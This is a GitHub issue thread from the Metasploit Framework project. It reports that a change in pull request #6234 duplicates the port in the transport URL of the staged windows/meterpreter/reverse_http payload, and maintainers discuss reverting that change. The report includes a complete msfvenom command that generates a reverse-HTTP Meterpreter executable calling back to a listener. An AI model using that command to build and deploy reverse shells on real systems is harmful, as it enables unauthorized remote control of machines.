### ISSUE TITLE
Transport configuration for windows/meterpreter/reverse_http is broken

### ISSUE THREAD

**Issue by joncave** [rapid7/metasploit-framework#6289]
Generate a staged reverse_http payload:

    ./msfvenom -p windows/meterpreter/reverse_http -f exe -o m.exe LHOST=192.168.58.1 LPORT=8888

The payload will connect back for the next stage, but it executing it will fail. Metasploit will kill it as an invalid session.

This happens because the transport configuration that is sent back specificies the following URL:

    http://192.168.58.1:8888:8888/...

This bug was introduced in #6234 which sets the lhost option to `req.headers['Host']` by default. In my use case the Host header is:

    Host: 192.168.58.1:8888

Therefore we end up with a duplicated port.

Not 100% sure what #6234 was aiming to fix so I couldn't easily develop a fix for this that would still satisfy that pull request.

**Comment by joncave** [comment]
Related to #6288 which was also caused by #6234.

**Comment by bcook-r7** [comment]
blah, that's bad; maybe we should look at temporarily pulling this out until we can rationalize the original PR

**Comment by joncave** [comment]
That's probably a good idea... unless it can be fixed quickly.

**Comment by vysec** [comment]
On another note, I am having issues with meterpreter_reverse_https, meterpreter/reverse_https. Anyone else have any issues?
